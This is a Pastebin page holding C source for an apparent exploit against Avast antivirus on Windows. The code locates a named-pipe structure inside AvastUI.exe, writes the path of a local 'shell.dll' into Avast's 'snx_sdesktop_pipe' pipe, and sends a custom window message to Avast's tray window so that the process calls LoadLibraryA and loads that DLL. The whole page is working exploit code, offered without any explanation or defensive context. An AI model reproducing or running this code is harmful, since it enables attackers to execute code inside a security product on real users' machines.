Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #define UNICODE
- #define _UNICODE
- #include <windows.h>
- #include <tchar.h>
- #include <winternl.h>
- #include <strsafe.h>
- #pragma comment( lib, "user32" )
- PBYTE memmem( PBYTE haystack, SIZE_T hlen, PBYTE needle, SIZE_T nlen )
- {
- BYTE needle_first;
- PBYTE p = haystack;
- SIZE_T plen = hlen;
- if ( !nlen )
- return NULL;
- needle_first = *needle;
- while ( plen >= nlen && ( p = memchr( p, needle_first, plen - nlen + 1 ) ) )
- {
- if ( !memcmp( p, needle, nlen ) )
- return p;
- p++;
- plen = hlen - ( p - haystack );
- }
- return NULL;
- }
- BOOL GetSectionInfo( PBYTE pModule, PBYTE szSectionName, PBYTE *ppSection, PDWORD pdwSectionSize )
- {
- PIMAGE_DOS_HEADER pDOSHeader;
- PIMAGE_NT_HEADERS pNTHeaders;
- PIMAGE_OPTIONAL_HEADER pOptionalHeader;
- PIMAGE_SECTION_HEADER pSectionHeader;
- UINT i;
- *ppSection = NULL;
- *pdwSectionSize = 0;
- pDOSHeader = ( PIMAGE_DOS_HEADER )pModule;
- if ( IMAGE_DOS_SIGNATURE != pDOSHeader->e_magic )
- return FALSE;
- pNTHeaders = ( PIMAGE_NT_HEADERS )( pModule + pDOSHeader->e_lfanew );
- if ( IMAGE_NT_SIGNATURE != pNTHeaders->Signature )
- return FALSE;
- pOptionalHeader = ( PIMAGE_OPTIONAL_HEADER )( &pNTHeaders->OptionalHeader );
- if ( IMAGE_NT_OPTIONAL_HDR_MAGIC != pOptionalHeader->Magic )
- return FALSE;
- pSectionHeader = ( PIMAGE_SECTION_HEADER )( ( PBYTE )pOptionalHeader + pNTHeaders->FileHeader.SizeOfOptionalHeader );
- for ( i = 0; i < pNTHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++ )
- {
- if ( strcmp( pSectionHeader->Name, szSectionName ) == 0 )
- {
- DWORD dwSize = pSectionHeader->Misc.VirtualSize;
- if ( dwSize % pOptionalHeader->SectionAlignment != 0 )
- dwSize += pOptionalHeader->SectionAlignment - ( dwSize % pOptionalHeader->SectionAlignment );
- *ppSection = pModule + pSectionHeader->VirtualAddress;
- *pdwSectionSize = dwSize;
- _tprintf( _T( "[?] %S: 0x%08Ix 0x%08x\n" ), pSectionHeader->Name, *ppSection, *pdwSectionSize );
- return TRUE;
- }
- }
- return FALSE;
- }
- static BYTE g_pbGadget[] = { 0x05, 0xff, 0xff, 0x55, 0x58 }; //add eax,-0A7AA0001h
- int _tmain( int argc, TCHAR *argv[] )
- {
- HMODULE hAvastUI;
- INT i;
- PBYTE pSection;
- DWORD dwSectionSize;
- DWORD_PTR dwpGadget;
- PBYTE pbNamedPipeStructure;
- HANDLE hPipe, hWnd;
- BYTE szDll[0x2c] = { 0 };
- DWORD dwBytesWritten;
- FARPROC pLoadLibraryA;
- if ( 0 == GetCurrentDirectoryA( sizeof( szDll ), szDll ) )
- {
- _tprintf( _T( "[-] GetCurrentDirectoryA() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- if ( FAILED( StringCchCatA( szDll, sizeof( szDll ), "\\shell.dll" ) ) )
- {
- _tprintf( _T( "[-] StringCchCatA() failed\n" ) );
- return 0;
- }
- hAvastUI = LoadLibraryEx( _T( "C:\\Program Files\\AVAST Software\\Avast\\AvastUI.exe" ),
- 0,
- DONT_RESOLVE_DLL_REFERENCES );
- _tprintf( _T( "[?] hAvastUI = 0x%08Ix\n" ), hAvastUI );
- if ( FALSE == GetSectionInfo( ( PBYTE )hAvastUI, ".text", &pSection, &dwSectionSize ) )
- {
- _tprintf( _T( "[-] AvastUI.exe '.text' section not found\n" ) );
- return 0;
- }
- dwpGadget = ( DWORD_PTR )memmem( pSection, dwSectionSize, g_pbGadget, sizeof( g_pbGadget ) );
- dwpGadget -= 4;
- pbNamedPipeStructure = *( PBYTE * )( dwpGadget );
- _tprintf( _T( "[?] pbNamedPipeStructure = 0x%08Ix\n" ), pbNamedPipeStructure );
- hWnd = FindWindow( _T( "asw_av_tray_icon_wndclass" ), 0 );
- if ( NULL == hWnd )
- {
- _tprintf( _T( "[-] FindWindow() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- for ( i = 0; i < 10; i++ )
- {
- WaitNamedPipe( _T( "\\\\.\\pipe\\snx_sdesktop_pipe" ),
- 0xffffffff );
- hPipe = CreateFile( _T( "\\\\.\\pipe\\snx_sdesktop_pipe" ),
- GENERIC_WRITE,
- 0,
- NULL,
- OPEN_EXISTING,
- 0,
- NULL );
- if ( INVALID_HANDLE_VALUE == hPipe )
- {
- _tprintf( _T( "[-] CreateFile() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- _tprintf( _T( "[?] Pipe successfully opened (%d)\n" ),
- i );
- if ( FALSE == WriteFile( hPipe,
- szDll,
- sizeof( szDll ),
- &dwBytesWritten,
- NULL ) || sizeof( szDll ) != dwBytesWritten )
- {
- _tprintf( _T( "[-] WriteFile() failed (0x%08x)\n" ),
- GetLastError() );
- return 0;
- }
- CloseHandle( hPipe );
- }
- pLoadLibraryA = GetProcAddress( GetModuleHandle( _T( "kernel32.dll" ) ),
- "LoadLibraryA" );
- SendMessage( hWnd,
- 0x83fd,
- ( WPARAM )pLoadLibraryA,
- ( LPARAM )pbNamedPipeStructure );
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement